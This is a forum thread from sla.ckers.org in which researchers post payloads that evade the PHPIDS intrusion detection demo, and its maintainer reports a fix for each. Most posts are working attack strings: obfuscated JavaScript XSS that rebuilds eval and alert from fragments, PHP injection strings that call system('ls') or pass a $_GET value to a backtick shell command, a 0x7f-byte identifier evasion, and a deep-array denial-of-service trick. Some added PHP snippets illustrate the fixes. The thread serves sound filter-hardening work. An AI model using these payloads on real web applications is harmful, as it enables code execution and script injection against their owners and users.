Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: tx
Date: December 17, 2007 07:08PM

Variations on thornmaker's alerts from the other day http://demo.phpids.org/?test=x%3D%21/x/%3F/x/-%2bd%3Aalert%0Ax%280%29 :
?test=x=!/x/?/x/-+d:alert
x(0)
?test=x=!#0={}?/x/-+x:alert
x(0)
?test=x=!disableExternalCapture?/x/-+text_goes_here:alert
x(0)
They can all be extended pretty much the same way for DoctorDan's alerts http://demo.phpids.org/?test=x%3D%21/%5C%5C/%3F%7B%7D%2B1-1%3Aalert%0ax%281%29:
?test=x=!/\\/?{}+1-1:alert
x(1)

EDIT: Fixed encoding/display.

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 12/17/2007 07:32PM by tx.

Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: thornmaker
Date: December 17, 2007 08:46PM

this one is pretty self explanatory: http://p42.us/phpids/33.html

The JavaScript is:
x=/x/
x.a='n'
x.a=x.a+'ame'
x.b=''.eval
x.a=x.b(x.a)
x.a=x.b(x.a)

Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Anonymous User
Date: December 18, 2007 04:50AM

Hi!

Wow - those gave me a hard time. I returned from Berlin yesterday night and fixed the first problems with a pretty hot needle. The rule you mentioned was of course buggy - it was meant to be \s and not s. This part of the rule was deleted anyway :) I just modified the converter slightly to catch the more complicated ones. Also the centrifuge is now a bit more thorough. Great work guys - 10x!

I think in two or three days we can release 0.4.4.

Greetings,
.mario

Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: tx
Date: December 18, 2007 02:07PM

More PHP RCE:
http://demo.php-ids.org/?test=%22%3B%7Bif%20%28true%29%20%24_a%5B%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%20%22ls%22%29%3B%20%7D%20//
";{if (true) $_a[]  = system;
$_a[0]( "ls"); } //
";{if (1) $_a[]  = system;
$_a[0]( "ls"); } //

Other ways of getting 'true' http://demo.php-ids.org/?test=%22%3B%7Bif%20%28%21%28%24_b%5B%5D%2b%2b%251%29%29%20%24_a%5B%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%20%22ls%22%29%3B%20%7D%20//
";{if (!($_b[]++%1)) $_a[]  = system;
$_a[0]( "ls"); } //
";{if (pi) $_a[]  = system;
$_a[0]( "ls");  } //
";{if (!a instanceof b) $_a[]  = system;
$_a[0]( "ls"); } //

EDIT: This gets caught (Score: 17), I just thought it was cool http://demo.php-ids.org/?test=%22%3B%7Bif%20%28%24_l%5B%5D%3D_GET%29%20%24_l%3D%26%20%24%24_l%20%5B0%5D%3B%20//%0A%24_a%5B%5D%20%3D%24_l%20%5Bb%5D%20%3B%0A%24_a%20%5B0%5D%20%28%24_l%20%5B%20a%20%5D%20%29%3B%7D%20//:
";{if ($_l[]=_GET) $_l=& $$_l [0]; //
$_a[] =$_l [b] ;
$_a [0] ($_l [ a ] );} //
It executes $_GET['b']($_GET['a']);

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 12/18/2007 03:49PM by tx.

Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Anonymous User
Date: December 18, 2007 03:50PM

Nice! I like the method assignment via the implicit push. Fixed...

Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: tx
Date: December 18, 2007 07:55PM

@.mario: nice fix. I've got a slight variant: http://demo.php-ids.org/?test=%22%3B//%0A%20if%20%28%21%28%24_b%5B%5D%2b%2b%251%29%29%20%24_a%5B0%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%20%22ls%22%29%3B%20%20//
";//
 if (!($_b[]++%1)) $_a[0]  = system;
$_a[0]( "ls");  //

EDIT: encoded '+'

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 12/18/2007 10:44PM by tx.

Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: tx
Date: December 19, 2007 02:59PM

More PHP code execution, this time with non-alpha, non-digit characters:
http://demo.php-ids.org/?test=%22%3B//%0A%20%24%7F%3Dphpinfo%3B%20%24%7F%28%29%3B%20//
This uses chr(0x7f):
?test=";//
 $=phpinfo; $(); //
php allows chars 0x7f-0xff as valid in variable names, meaning this works: http://demo.php-ids.org/?test=%22%3B//%0A%20%24%7f%c9%e0%3Dphpinfo%3B%20%24%7f%c9%e0%28%29%3B%20//
so far 0x7f is the only one I've found that will evade the filter in and of itself though.

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 12/19/2007 02:59PM by tx.

Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Gareth Heyes
Date: December 20, 2007 04:47AM

This gets through the XSS filters:-
\u50000=1
if(\u50000)\u50001=/eva/[-1]
if(\u50000)\u50002=/aler/[-1]
0[\u50001+'l'](\u50002+'t(1)')

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Anonymous User
Date: December 20, 2007 07:13AM

@tx: Wow - I didn't know about that. Normally the char should have been converted by the outOfRange Converter - but I was accidentally using >=128 - not >=127 - 10x!

@Gareth: Fixed ;)

Greetings,
.mario
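Why the converter threshold .mario mentions matters, as an added illustration that is not PHPIDS's own code: PHP accepts bytes 0x7f-0xff in identifiers, so a normaliser that only rewrites bytes >= 0x80 leaves a 0x7f variable name untouched and a later name-based rule never fires. The function names, the placeholder character and the toy rule are assumptions for this example.

```php
<?php
// Added illustration, not PHPIDS code: an "out of range" normaliser that
// replaces high bytes with a printable placeholder before rules run.
function normalize_out_of_range(string $input, int $threshold): string
{
    // Every byte at or above $threshold becomes 'x' (assumed placeholder),
    // so a name like "$<0x7f>" is rewritten to "$x" for the rules below.
    $pattern = sprintf('/[\x%02x-\xff]/', $threshold);
    return preg_replace($pattern, 'x', $input);
}

// Toy rule (an assumption for this example only): a variable assigned a bare
// function name and then called, e.g. "$x=phpinfo; $x()".
function contains_call_by_variable(string $normalized): bool
{
    return (bool) preg_match('/\$(\w+)\s*=\s*\w+\s*;.*\$\1\s*\(/s', $normalized);
}

// Constructed sample, modelled on the chr(0x7f) vector discussed in this thread.
$sample = "\"; //\n \$\x7f=phpinfo; \$\x7f(); //";

// Compare the off-by-one threshold (>=128, misses 0x7f) with the corrected
// one (>=127): only the corrected threshold lets the rule see "$x".
foreach ([0x80 => 'buggy (>=128)', 0x7f => 'fixed (>=127)'] as $threshold => $label) {
    $normalized = normalize_out_of_range($sample, $threshold);
    printf("%s: %s\n", $label, contains_call_by_variable($normalized) ? 'flagged' : 'missed');
}
```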

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: tx
Date: December 21, 2007 06:51PM

Multiple semicolons break the comment regex:
http://demo.php-ids.org/?test=%22%3B%3B%20//%0A%20if%20%28%21%28%24_b%5B%5D++%251%29%29%20%24_a%5B0%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%21a.%20%22ls%22%29%3B%20%20//
?test=";; //
 if (!($_b[]++%1)) $_a[0]  = system;
$_a[0](!a. "ls");  //

Similar variation: http://demo.php-ids.org/?test=%22%3B%3B//%0Aif%281%29%24_a%5B0%5D%3Dsystem%3B%0A%24_a%5B0%5D%28%21php.%22ls%22%29%3B//
?test=";;//
if(1)$_a[0]=system;
$_a[0](!php."ls");//

-tx @ lowtech-labs.org

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: December 22, 2007 03:00AM

70 characters:

x=/eva/i[-1]
$y=/nam/i[-1]
$x$_0=(0)[x+'l']
$x=$x$_0($y+'e')
$x$_0($x)

produces [p42.us].

Note that 0[eval] will no longer work in Firefox 3. However all is not lost; x setter=eval still works (though is easily detected by phpids).

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: December 22, 2007 07:16AM

@tx: Thanks - I should have thought about multiple semicolons :-/ Both ones are fixed!

@thornmaker: Nice - DoctorDan's trick combined with regex modifiers. I didn't concentrate on catching the 0[eval] though but on removing the Library XSS and enhancing some existing ones - so the rules shrank again :)

Greetings and happy holidays!
.mario

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Spyware
Date: December 22, 2007 08:37AM

http://demo.php-ids.org/?test[]

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: December 22, 2007 05:58PM

@Spyware: um - yes?

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Spyware
Date: December 22, 2007 06:28PM

I just noticed that if you put [] after the "test" (in the url), it would output "Array". I have never seen any exploits or something using this glitch, but maybe it's exploitable in some way.

I now realize I have posted this in the wrong section of this forum, sorry.

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: December 23, 2007 01:21AM

@spyware: I had never seen that before... very interesting.

@.mario: http://p42.us/phpids/35.html

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Gareth Heyes
Date: December 23, 2007 05:26AM

Stefan Esser told me about one DoS attack which returns a white page on certain versions of PHP if you use a long multidimensional array like:-
test[][][][][][][][][]=1 etc


Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: December 23, 2007 05:48AM

@Spyware: Ah okay - now I get it ;) It's missing validation before output. Thx for pointing out!

@thornmaker: I knew it - damn :) *fixing*



Edited 1 time(s). Last edit at 12/23/2007 06:38AM by .mario.
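For Spyware's test[] observation and Gareth's deep-array note, an added example that is not the demo page's code: PHP parses "?test[]" into an array, so a page that echoes $_GET['test'] without checking its type prints "Array". The helper names and the depth limit are assumptions chosen for this example.

```php
<?php
// Added example, not code from the demo page. Validate the type of a query
// parameter before use, and measure nesting depth of parsed input. PHP itself
// caps nesting via the max_input_nesting_level ini setting (default 64).
function scalar_query_param(array $query, string $name): ?string
{
    // Accept only a string; an absent key or an array (from "name[]") gives null.
    $value = $query[$name] ?? null;
    return is_string($value) ? $value : null;
}

function array_depth($value): int
{
    if (!is_array($value)) {
        return 0;
    }
    $max = 0;
    foreach ($value as $child) {
        $max = max($max, array_depth($child));
    }
    return $max + 1;
}

// Application-level cap (limit is an assumed value) for "test[][][]..." input.
function query_too_deep(array $query, int $limit = 4): bool
{
    return array_depth($query) > $limit;
}

// Constructed inputs, parsed the way PHP builds $_GET from the query strings
// "?test=x", "?test[]" and "?test[][][][][][]=1".
parse_str('test=x', $plain);
parse_str('test[]', $bracket);
parse_str('test[][][][][][]=1', $deep);

var_dump(scalar_query_param($plain, 'test'));    // plain string parameter
var_dump(scalar_query_param($bracket, 'test'));  // array parameter is rejected
var_dump(query_too_deep($deep));                 // nesting beyond the cap
```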

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: December 23, 2007 10:47PM

http://p42.us/phpids/36.html

[Edit] added the following JavaScript for this one:
$x=(/val/)[-1]
$z=/nam/
$x=(0)['e'+$x]
$z=$z[-1]+'e'
$x($x($z)+'x')



Edited 1 time(s). Last edit at 12/29/2007 12:54PM by thornmaker.

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: DoctorDan
Date: December 29, 2007 12:00PM

This is somewhat similar to thornmaker's above...
$y=('eva')
$z={}[$y+'l']
$y=('aler')
$y+=(/t(1)/)[-1]
$z($y)

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: DoctorDan
Date: December 30, 2007 02:35PM

[$y=('al')]&&[$z=$y]&&[$z+=('ert')+[]][DocDan=(/ev/)[-1]+$y]($z).valueOf()(1)

EDIT: if I remember correctly, this may only work in FF2



Edited 1 time(s). Last edit at 12/30/2007 02:48PM by DoctorDan.

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: December 30, 2007 03:25PM

DoctorDan: both are good finds!

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 01, 2008 05:16PM

Hey!

Yep - very nice ones indeed! I just returned from 24C3 and fixed the stuff - this time by doing some work on the centrifuge. I am not yet sure that this fix will really work but let's see. I implemented a kind of ratio-check depending on the ratio between string length and amount of certain special chars.

Greetings, 10x and happy new year!
.mario
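A ratio check of the kind .mario describes, as an added example that is not the PHPIDS centrifuge: the share of syntax characters in an input is compared against its length, which is why short, punctuation-dense vectors stand out from prose. The character class, the minimum length and the 0.3 threshold are assumptions for this example.

```php
<?php
// Added illustration, not PHPIDS code: compare input length with the number
// of characters that carry JS/PHP syntax but are rare in ordinary text.
function special_char_ratio(string $input): float
{
    // Assumed character class for this example: brackets, operators, quotes.
    $special = preg_match_all('/[\[\]\(\)\{\}\$=\+\-\/\\\\!\|&\'"`;:?]/', $input);
    $length  = max(strlen($input), 1);
    return $special / $length;
}

function centrifuge_flags(string $input, float $threshold = 0.3): bool
{
    // Very short inputs are ignored so punctuation in small form fields
    // (assumed minimum of 12 bytes) does not trigger the check.
    if (strlen($input) < 12) {
        return false;
    }
    return special_char_ratio($input) >= $threshold;
}

// Constructed samples: a harmless sentence and two of the obfuscated vectors
// posted earlier in this thread.
$samples = [
    "Please send me the invoice (PDF) by Friday, thanks!",
    "[\$y=('al')]&[\$z=\$y+'ert'][a=(1?/ev/:0)[-1]+\$y](\$z)(1)",
    "\"; e|\$a=&\$_GET; \$a[a](`\$a[b]`);//",
];

foreach ($samples as $s) {
    printf("%.2f %-8s %s\n", special_char_ratio($s),
        centrifuge_flags($s) ? 'flagged' : 'clean', $s);
}
```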

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: thornmaker
Date: January 02, 2008 12:01AM

I've been losing track of the filtering behind the centrifuge... is this page no longer current?

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 02, 2008 06:58AM

Ah no - that was just the alpha version. The current revision can be found here (very last method).

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: tx
Date: January 04, 2008 04:19PM

This was super hard to sneak under the centrifuge:
http://demo.php-ids.org/?test=%22%3B%20e%7C%24a%3D%26%24_GET%3B%200%7C%24b%3D%21a%20.%24a%5Bb%5D%3B%24a%5Ba%5D%28%60%24b%60%29%3B//
?test="; e|$a=&$_GET; 0|$b=!a .$a[b];$a[a](`$b`);//
Even shorter:
?test="; e|$a=&$_GET; $a[a](`$a[b]`);//
The code executes $_GET['a'](`$_GET['b']`) as in
http://localhost/rce.php
?eval="; e|$a=&$_GET; $a[a](`$a[b]`);//
&a=printf
&b=touch some_file
EDIT: So $_GET['a'] would have to be a function like printf,sprintf,etc. and $_GET['b'] is what would pass through to the command line.

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 01/04/2008 04:22PM by tx.

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 04, 2008 06:38PM

Nice circumvention! Just fixed the issue and extended the tests with this kind of vectors. 10x!

Greetings,
.mario

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Gareth Heyes
Date: January 04, 2008 07:11PM

tx u rule! hehe top work!




Edited 1 time(s). Last edit at 01/04/2008 07:12PM by Gareth Heyes.

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: tx
Date: January 07, 2008 05:47PM

@Gareth,.mario: thx :)

I've got another. This is a variation on DoctorDan's vector, shortened to sneak under the centrifuge, which required a few other minor changes:
http://demo.phpids.org/?test=%5B%24y%3D%28%27al%27%29%5D%26%5B%24z%3D%24y+%27ert%27%5D%5Ba%3D%281%3F/ev/%3A0%29%5B-1%5D+%24y%5D%28%24z%29%281%29
[$y=('al')]&[$z=$y+'ert'][a=(1?/ev/:0)[-1]+$y]($z)(1)
Only tested in FF2, I don't know if it works in IE.

-tx @ lowtech-labs.org

Re: PHPIDS (0.4.4 - crafted by eggnog-drunk elves and a shaved reindeer)
Posted by: Anonymous User
Date: January 08, 2008 03:25AM

Hi!

Wow - this is a nice one. DoctorDan's array to string conversion combined with a ternary test.

Thx!
.mario
